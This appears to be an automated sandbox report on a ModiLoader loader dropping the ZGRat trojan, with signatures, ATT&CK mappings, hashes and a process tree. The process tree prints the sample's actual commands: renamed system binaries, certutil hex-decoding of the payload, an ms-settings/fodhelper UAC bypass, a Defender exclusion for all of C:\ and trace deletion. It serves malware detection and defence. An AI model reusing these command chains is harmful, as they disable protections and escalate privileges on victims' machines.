Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-05-2024 08:48

General

  • Target

    doc023561361500.cmd

  • Size

    4.9MB

  • MD5

    d05bed0572c3ce597f3b4be7a2606c08

  • SHA1

    f621468b397308f1055afaf2f27814a390eb16ea

  • SHA256

    e84dd67c7831168c1d7a0f11a78d1e0497eb1cfa8689b25b291ee4b1b96826a4

  • SHA512

    4fbe7a932d91882491648b489ec1e2c349ec71423c071e3f751c130e51ae62881473a9feaf3d842c60ed2fb6922b59f0b611491145e84b07e7145efb0ca7ec79

  • SSDEEP

    24576:sYkuWvLHtSs/yfVZIC5z65HTGq42xfcJele9P2dxBJGhRC8Ih:sYkuWTcDXB65HPxfhleljIh

Malware Config

Signatures

  • Detect ZGRat V1 33 IoCs
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • ModiLoader Second Stage 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 26 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3408
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:880
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        2⤵
        • Executes dropped EXE
        PID:3040
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        2⤵
        • Executes dropped EXE
        PID:1716
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:5548
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:5956
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4344
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
            3⤵
            • Executes dropped EXE
            PID:5684
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:5140
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            3⤵
              PID:2916
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:5264
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              3⤵
                PID:4072
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3664
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                3⤵
                  PID:3456
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4364
                • C:\Users\Public\xkn.exe
                  C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:5636
                  • C:\Users\Public\alpha.exe
                    "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3688
                    • C:\Users\Public\ger.exe
                      C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                      5⤵
                      • Executes dropped EXE
                      • Modifies registry class
                      PID:4144
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4840
                • C:\Users\Public\kn.exe
                  C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                  3⤵
                  • Executes dropped EXE
                  PID:6084
              • C:\Windows \System32\per.exe
                "C:\\Windows \\System32\\per.exe"
                2⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:5632
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1472
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM SystemSettings.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4736
              • C:\Users\Public\Libraries\Ping_c.pif
                C:\Users\Public\Libraries\Ping_c.pif
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2724
                • C:\Users\Public\Libraries\huqnearJ.pif
                  C:\Users\Public\Libraries\huqnearJ.pif
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4712
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                2⤵
                • Executes dropped EXE
                PID:2556
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                2⤵
                • Executes dropped EXE
                PID:2372
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                2⤵
                • Executes dropped EXE
                PID:3676
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:5912
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:1508
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:3068
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:5244
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                2⤵
                • Executes dropped EXE
                PID:1752
            • C:\Windows\system32\SystemSettingsAdminFlows.exe
              "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
              1⤵
                PID:2148

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Credential Access

              Unsecured Credentials

              4
              T1552

              Credentials In Files

              3
              T1552.001

              Credentials in Registry

              1
              T1552.002

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              1
              T1082

              Collection

              Data from Local System

              4
              T1005

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uwsyn1re.lg4.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Public\Libraries\Ping_c.pif
                Filesize

                1.7MB

                MD5

                ba58a19a6475eff2c5bb9b6dfc7d9dd3

                SHA1

                407eda96d6cc766e17a6a27cf37cc63dd82537f3

                SHA256

                22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57

                SHA512

                6e53a2642c36cddc8cad22ca898c358d3393bd0a880fb5d364cb4aa38ef200b9b0b06dd03a13d05ef91e9867cb172eb2e05a021f0b28282028f8a1eaacdaf9e0

              • C:\Users\Public\Libraries\huqnearJ.pif
                Filesize

                66KB

                MD5

                c116d3604ceafe7057d77ff27552c215

                SHA1

                452b14432fb5758b46f2897aeccd89f7c82a727d

                SHA256

                7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

                SHA512

                9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

              • C:\Users\Public\Ping_c.mp4
                Filesize

                3.4MB

                MD5

                c5d58251c6989580fcf2b5d75ea57467

                SHA1

                1b5c775600d8aa1e247574a9ff8620a3c2e74347

                SHA256

                36df0e80ac34f848b1934565413598f7c2087a81e6e4bd69de10be2f86ed15ee

                SHA512

                9efdb53e6902716f1e4ee794dd1e315080817c6eb8045f8a2c62478fb05d8aae7d53b3a8595842f319f49c8075f7522341feea66a47b0f438690905e405c76fc

              • C:\Users\Public\alpha.exe
                Filesize

                283KB

                MD5

                8a2122e8162dbef04694b9c3e0b6cdee

                SHA1

                f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                SHA256

                b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                SHA512

                99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

              • C:\Users\Public\ger.exe
                Filesize

                75KB

                MD5

                227f63e1d9008b36bdbcc4b397780be4

                SHA1

                c0db341defa8ef40c03ed769a9001d600e0f4dae

                SHA256

                c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

                SHA512

                101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

              • C:\Users\Public\kn.exe
                Filesize

                1.6MB

                MD5

                bd8d9943a9b1def98eb83e0fa48796c2

                SHA1

                70e89852f023ab7cde0173eda1208dbb580f1e4f

                SHA256

                8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

                SHA512

                95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

              • C:\Users\Public\xkn.exe
                Filesize

                442KB

                MD5

                04029e121a0cfa5991749937dd22a1d9

                SHA1

                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                SHA256

                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                SHA512

                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

              • C:\Windows \System32\per.exe
                Filesize

                48KB

                MD5

                85018be1fd913656bc9ff541f017eacd

                SHA1

                26d7407931b713e0f0fa8b872feecdb3cf49065a

                SHA256

                c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

                SHA512

                3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

              • memory/2724-76-0x0000000000400000-0x00000000005B9000-memory.dmp
                Filesize

                1.7MB

              • memory/4712-124-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-114-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-84-0x0000000031F10000-0x0000000031F6C000-memory.dmp
                Filesize

                368KB

              • memory/4712-85-0x0000000034560000-0x0000000034B04000-memory.dmp
                Filesize

                5.6MB

              • memory/4712-86-0x0000000034B50000-0x0000000034BAA000-memory.dmp
                Filesize

                360KB

              • memory/4712-98-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-146-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-144-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-143-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-140-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-138-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-136-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-134-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-130-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-128-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-126-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-79-0x0000000000400000-0x0000000001400000-memory.dmp
                Filesize

                16.0MB

              • memory/4712-122-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-120-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-118-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-116-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-82-0x0000000000400000-0x0000000001400000-memory.dmp
                Filesize

                16.0MB

              • memory/4712-112-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-108-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-106-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-104-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-102-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-100-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-96-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-94-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-92-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-90-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-132-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-110-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-87-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-88-0x0000000034B50000-0x0000000034BA5000-memory.dmp
                Filesize

                340KB

              • memory/4712-1173-0x0000000034CB0000-0x0000000034D16000-memory.dmp
                Filesize

                408KB

              • memory/4712-1174-0x0000000035B70000-0x0000000035BC0000-memory.dmp
                Filesize

                320KB

              • memory/4712-1175-0x0000000035BC0000-0x0000000035C5C000-memory.dmp
                Filesize

                624KB

              • memory/4712-1178-0x0000000035CE0000-0x0000000035D72000-memory.dmp
                Filesize

                584KB

              • memory/4712-1179-0x0000000035E00000-0x0000000035E0A000-memory.dmp
                Filesize

                40KB

              • memory/5636-42-0x00000241282C0000-0x00000241282E2000-memory.dmp
                Filesize

                136KB

              • memory/5636-52-0x0000024127FA0000-0x00000241281BC000-memory.dmp
                Filesize

                2.1MB